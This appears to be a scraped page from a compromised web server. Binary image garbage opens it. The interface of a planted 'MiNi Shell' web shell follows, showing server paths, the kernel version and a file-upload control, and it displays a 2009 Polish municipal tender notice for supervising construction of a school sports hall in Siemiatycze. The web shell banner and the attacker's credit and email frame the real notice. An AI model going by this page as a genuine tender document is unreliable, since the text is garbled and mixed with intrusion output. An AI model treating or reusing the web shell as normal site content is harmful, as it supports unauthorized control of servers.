JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090421/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090421/114426-N-2009.html

<p class="kh_header"><b>Siemiatycze: Usługa pełnienia funkcji inspektora nadzoru inwestorskiego nad realizacja robót budowlanych w zakresie zadania pod nazwą: BUDOWA HALI WIDOWISKOWO - SPORTOWEJ PRZY GIMNAZJUM PUBLICZNYM NR 1 W SIEMIATYCZACH</b><br>
<b>Numer ogłoszenia: 114426 - 2009; data zamieszczenia: 21.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Burmistrz Miasta Siemiatycze , ul. Pałacowa 2, 17-300 Siemiatycze, woj. podlaskie, tel. 085 6565800, 6565815, faks 085 6565803.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.um.siemiatycze.samorzady.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługa pełnienia funkcji inspektora nadzoru inwestorskiego nad realizacja robót budowlanych w zakresie zadania pod nazwą: BUDOWA HALI WIDOWISKOWO - SPORTOWEJ PRZY GIMNAZJUM PUBLICZNYM NR 1 W SIEMIATYCZACH.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest wykonanie usługi polegającej na pełnieniu funkcji Inspektora Nadzoru na budowie dla inwestycji pod nazwą  Budowa hali widowiskowo - sportowej przy Gimnazjum Publicznym Nr 1 w Siemiatyczach określonej we Wspólnym Słowniku Zamówień (CPV) jako 71.52.00.00-9 (usługi nadzoru budowlanego). Wykonawca pełnić będzie obowiązki i funkcję Inspektora Nadzoru Inwestorskiego zgodnie z ustawą z dnia 07 lipca 1994 r. Prawo budowlane (Dz.U. z 2006 r., Nr 156, poz. 1118 z późn. zm.) oraz reprezentować będzie Inwestora (Zamawiającego) w ramach realizacji projektu, którego postępowanie dotyczy.
2.Wykonawcy przed złożeniem oferty powinni zapoznać się z dokumentacją projektową dostępną w Urzędzie Miasta Siemiatycze ul. Pałacowa 2, 17-300 Siemiatycze, pokój 113 w godz. od 8:00 do 15:00 oraz na stronie internetowej Zamawiającego www.um.siemiatycze.samorzady.pl
3.Zamawiający informuje, że rozpoczęcie inwestycji prowadzonej pod nazwą Budowa hali widowiskowo - sportowej przy Gimnazjum Publicznym Nr 1 w Siemiatyczach planuje się na miesiąc maj 2009 roku, natomiast zakończenie planuje się do dnia 31.10.2010 roku.
4.Ponadto Zamawiający informuje, że miejscem wykonywania usługi będącej przedmiotem niniejszego postępowania przetargowego jest teren Gimnazjum Publicznego Nr 1 ul. Świętojańska 25, 17-300 Siemiatycze (nr geod. działek 845, 844-8, 5175-1, 5175-7, 843-7, 847).
5.Zamawiający informuje, że wartość nadzorowanych robót, na dzień wszczęcia niniejszego postępowania przetargowego, szacuje się na kwotę:
a)pełnienie nadzoru inwestorskiego w branży budowlanej - przerób  5.276.057,33zł netto
b)pełnienie nadzoru inwestorskiego w branży sanitarnej - przerób    1.076.748,46zł netto
c)pełnienie nadzoru inwestorskiego w branży elektrycznej - przerób   383.693,56 zł netto
d)pełnienie nadzoru inwestorskiego w branży drogowej - przerób       608.591,45 zł netto
e)przerób razem - 7.345.090,80zł netto
6.Zadaniem Wykonawcy jest zapewnienie kompleksowej obsługi prowadzonej inwestycji w zakresie pełnienia funkcji inspektora nadzoru inwestorskiego (wszystkich branż) nad realizacją robót budowlanych. Zakres zadań Inspektora nadzoru inwestorskiego  obejmuje czynności, o których mowa w niniejszej specyfikacji oraz w umowie z Wykonawcą.
7.W szczególności Inspektor Nadzoru jest zobowiązany do
-kontroli dokumentacji projektowej Wykonawcy
-czuwania nad realizacją harmonogramu
-nadzoru nad prawidłowym przygotowaniem i złożeniem wniosków o zmianę pozwolenia na budowę
-przekazania Wykonawcy protokolarnie terenu budowy
-zapewnienie nadzoru inwestorskiego na budowie
-koordynacji robót budowlanych
-zorganizowania i uczestniczenia w rozruchu technologicznym wbudowanych maszyn i urządzeń
-organizacji i dokonywania odbiorów w terminach określonych w umowie z Wykonawcą, a także umożliwienia przedstawicielom Zamawiającego udziału w komisjach odbioru
-nadzoru nad prawidłowym przygotowaniem i przekazaniem zawiadomienia o zakończeniu budowy i uzyskaniem ostatecznej decyzji o pozwoleniu na użytkowanie
-rozliczania finansowego inwestycji, sprawdzania prawidłowości dokumentów przedkładanych przez Wykonawcę w celu uruchomienia płatności określonych w umowie z Wykonawcą
-czuwania nad realizacją pozostałych obowiązków Wykonawcy i uprawnień Zamawiającego wynikających z umowy z Wykonawcą
-wykonywania czynności określonych w umowie w sposób gwarantujący zachowanie terminów określonych w umowie z Wykonawcą
-wykonywanie innych czynności przewidzianych w ustawie Prawo budowlane dla Zamawiającego na podstawie stosownego upoważnienia wydanego do danej czynności
-kontrola terminowości wykonywania robót, ich ilości, jakości i wartości oraz prawidłowości fakturowania zgodnie z umową zawartą z Wykonawcą robót
-obecność na budowie co najmniej 4 razy w tygodniu oraz na każde wezwanie Zamawiającego oraz Wykonawcy robót i dokumentowania swoich wizyt wpisem do dziennika budowy, z podaniem zakresu robót, które zostały przez niego sprawdzone oraz na każde żądanie Zamawiającego
-sprawdzanie kosztorysów na roboty podstawowe i dodatkowe nieprzewidziane, konieczne i zamienne oraz kontrola prawidłowości ich fakturowania
-koordynowanie prac inspektorów branżowych
-rozliczanie końcowe finansowe robót budowlanych zgodnie z umową z Wykonawcą robót
-skompletowanie dokumentacji niezbędnej dla uzyskania pozwolenia na użytkowanie
-wyznaczania terminów prób w porozumieniu z Wykonawcą robót budowlanych, uczestnictwa i nadzoru nad próbami
-wystawiania Wykonawcy robót budowlanych świadectwa, potwierdzającego pozytywny wynik prób
-stałe konsultowanie i fachowe doradztwo na rzecz Inwestora (Zamawiającego)
-współpraca z Inwestorem, jednostką projektową i wykonawczą w zakresie realizowanych robót budowlanych
-wykonanie czynności wynikających z udzielonej przez wykonawcę  36 miesięcznej gwarancji i rękojmi na roboty budowlane, łącznie z uczestnictwem w komisjach powołanych przez inwestora do oceny jakości robót w okresie gwarancji i rękojmi
-zawiadomienie wykonawcy robót budowlanych o stwierdzonych wadach w okresie 36 miesięcznej gwarancji i rękojmi
-sporządzenie wniosków o zapłatę kar umownych za zwłokę w usunięciu wad stwierdzonych w okresie 36 miesięcznej gwarancji i rękojmi
-sporządzenie protokołu pousterkowego
8.Szczegółowy zakres usługi określa wzór umowy - zał. nr 3 do SIWZ.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.52.00.00-9.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> W  przedmiotowym postępowaniu wadium nie jest wymagane.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Dokumenty powinny być złożone w formie oryginału bądź kopii poświadczonej za zgodność z oryginałem przez Wykonawcę za wyjątkiem pełnomocnictwa, które powinno być złożone w formie oryginału lub kopii potwierdzonej notarialnie.
V.1. W celu potwierdzenia, że Wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu z postępowania na podstawie art. 24 ustawy, Wykonawca jest zobowiązany złożyć do oferty przetargowej następujące dokumenty i oświadczenia:
a)oświadczenie Wykonawcy zgodnie z art. 22 ust. 1, i art. 24 ust. 1 i 2 ustawy - sporządzone według wzoru stanowiącego załącznik nr 2 do niniejszej siwz
b)aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert
w przypadku wspólnego ubiegania się o udzielenie zamówienia przez dwóch lub więcej Wykonawców w ofercie muszą być złożone przedmiotowe dokumenty dla każdego z nich
c)aktualnej informacji z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
d)aktualnej informacji z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert
V.2. W celu potwierdzenia, opisanego przez Zamawiającego warunku posiadania przez Wykonawcę niezbędnej wiedzy i doświadczenia oraz dysponowania potencjałem technicznym i osobami zdolnymi do wykonania zamówienia, Wykonawca zobowiązany jest do oferty przetargowej złożyć następujące dokumenty i oświadczenia:
a)wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, usług w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością usługą stanowiącym przedmiot zamówienia, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz załączenia dokumentów potwierdzających, że te usługi zostały wykonane należycie (listy referencyjne), z którego wynika, że Wykonawca w ciągu ostatnich trzech lat wykonał co najmniej dwie usługi nadzoru inwestorskiego nad realizacją robót budowlanych w obiektach użyteczności publicznej o wartości inwestycji co najmniej 1.000.000,00 złotych (słownie: jeden milion złotych 00/100) udokumentowane referencjami (zakres wykonanych usług wymienionych w wykazie musi mieć odzwierciedlenie w dokumentach potwierdzających, że te usługi zostały wykonane należycie - listy referencyjne) - sporządzony według wzoru stanowiącego zał. nr 6 do siwz). Wykaz osób, którymi dysponuje lub będzie dysponował Wykonawca i które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonywania przez nie czynności, lub ewentualnie dodatkowo pisemnego zobowiązania innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie, o którym mowa w niniejszym punkcie, Wykonawca wskazał osoby, którymi będzie dysponował sporządzony według wzoru zał. nr 5 do siwz.
Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że dysponuje lub będzie dysponował odpowiednio wykwalifikowanym personelem, posiadającym niezbędne uprawnienia budowlane lub decyzję potwierdzającą odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów do nadzorowania robót w specjalności:
konstrukcyjno-budowlanej bez ograniczeń - minimum jedna osoba, z co najmniej 3 letnim doświadczeniem zawodowym jako inspektora nadzoru inwestorskiego przy realizacji co najmniej 2 obiektów o charakterze użyteczności publicznej o wartości inwestycji co najmniej 1.000.000,00 zł, która będzie pełnić funkcję Koordynatora Inspektorów Nadzoru Inwestorskiego
instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych - minimum jedna osoba, z co najmniej 3 letnim doświadczeniem zawodowym jako inspektora nadzoru inspektorskiego wymienionych robót instalacyjnych przy realizacji co najmniej jednego obiektu o charakterze użyteczności publicznej
instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych- minimum jedna osoba, z co najmniej 3 letnim doświadczeniem zawodowym jako inspektora nadzoru inspektorskiego wymienionych robót instalacyjnych przy realizacji co najmniej jednego obiektu o charakterze użyteczności publicznej
drogowej- minimum jedna osoba, z co najmniej 3 letnim doświadczeniem zawodowym jako inspektora nadzoru inspektorskiego wymienionych robót przy realizacji co najmniej jednego obiektu o charakterze użyteczności publicznej
Do wykazu, o którym mowa w niniejszym punkcie Wykonawcy zobowiązani są dołączyć dokumenty stwierdzające, że osoby, o których mowa wyżej posiadają wymagane uprawnienia, tj. oryginały lub kserokopie potwierdzone za zgodność z oryginałem uprawnień zawodowych wraz z aktualnym zaświadczeniem o przynależności tych osób do właściwej izby samorządu zawodowego.
b)pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych niezbędnych do wykonania zamówienia, jeżeli w wykazie o którym mowa w punkcie a) powyżej Wykonawca wskazał osoby którymi będzie dysponował
c)decyzję o nadaniu uprawnień do kierowania robotami w specjalności budowlano-konstrukcyjnej bez ograniczeń, lub decyzję o stwierdzeniu przygotowania zawodowego upoważniającą do wykonywania samodzielnej funkcji kierownika budowy oraz zaświadczenie o wpisie na listę członków izby samorządu inżynierów budownictwa, dla koordynatora inspektorów nadzoru, o którym mowa w niniejszym punkcie
d)decyzje o nadaniu uprawnień do kierowania robotami lub decyzje o stwierdzeniu przygotowania zawodowego upoważniającą do wykonywania samodzielnej funkcji kierownika budowy oraz zaświadczenie o wpisie na listę członków izby samorządu inżynierów budownictwa, dla inspektorów nadzoru w specjalnościach o których mowa w niniejszym punkcie
V.3. W celu potwierdzenia opisanego przez Zamawiającego warunku znajdowania się przez Wykonawcę w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, Wykonawca zobowiązany jest do oferty przetargowej złożyć następujące dokumenty i oświadczenia:
a)oświadczenie Wykonawcy - sporządzone według wzoru stanowiącego załącznik nr 2 do niniejszej siwz
UWAGA!
Nie spełnienie choćby jednego z warunków podmiotowych, o których mowa wyżej, skutkować będzie wykluczeniem Wykonawcy z niniejszego postępowania przetargowego.
V.4. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w pkt.1. b, c, d, e niniejszego rozdziału - składa dokument lub dokumenty  wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że :
a)nie otwarto jego likwidacji ani nie ogłoszono upadłości,
b)nie orzeczono wobec niego zakazu ubiegania się o zamówienie,
c)nie zalega z uiszczaniem podatków, opłat lub składek na ubezpieczenia społeczne lub zdrowotne albo, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu.
Zamiast dokumentów, o których mowa w pkt. 1d - składa zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt. 4-8 ustawy.
Dokumenty, o których mowa w pkt. 1 b, d, e powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert 
Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w rozdziale V niniejszej specyfikacji, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.Oferta ma zawierać:
a)wypełniony formularz ofertowy (wg załączonego wzoru - zał. nr 1 do specyfikacji),
b)dokumenty i oświadczenia potwierdzające spełnianie przez Wykonawców warunków udziału w postępowaniu (wymienione w rozdziale V. specyfikacji),
c)parafowany wzór umowy - zał. nr 3
d)w przypadku Wykonawców działających przez pełnomocnika - pełnomocnictwo, 
e)w przypadku Wykonawców wspólnie ubiegających się o zamówienie - dokument stwierdzający ustanowienie przez Wykonawców wspólnie ubiegających się o zamówienie pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego,
f)oświadczenie - zał. nr 2 do siwz
g)wykaz części zamówienia - zał. nr 4 do siwz
h)wykaz osób - zał. nr 5 do siwz
i)wykaz usług - zał. nr 6 do siwz
2.Ofertę podpisują osoby uprawnione do reprezentowania Wykonawcy w obrocie gospodarczym, zgodnie z aktem rejestracyjnym - pod rygorem nieważności. Jeśli ofertę podpisuje pełnomocnik, pełnomocnictwo winno być złożone w oryginale, natomiast dopuszczalne jest złożenie kserokopii pełnomocnictwa potwierdzonego notarialnie. Do pełnomocnictw art. 26 ust. 3 ustawy prawo zamówień publicznych stosuje się odpowiednio. Od pełnomocnictwa do występowania w imieniu Wykonawcy w postępowaniach o zamówienie publiczne nie wnosi się opłaty skarbowej (interpretacja Departamentu Prawnego UZP z dnia 30.01.2007 r.). Jeśli Wykonawca przystępujący do postępowania prowadzi działalność w formie spółki z ograniczoną odpowiedzialnością, a wartość jego oferty przewyższa dwukrotną wysokość kapitału zakładowego, do oferty tej należy dołączyć odpowiednie dokumenty wymagane w art. 230 kodeksu spółek handlowych (uchwała wspólników lub umowa spółki)..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.um.siemiatycze.samorzady.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Siemiatycze
ul. Pałacowa 2
17-300 Siemiatycze
pokój 108.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.04.2009 godzina 11:00, miejsce: Urząd Miasta Siemiatycze
ul. Pałacowa 2
17-300 Siemiatycze
pokój 111 (sekretariat).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com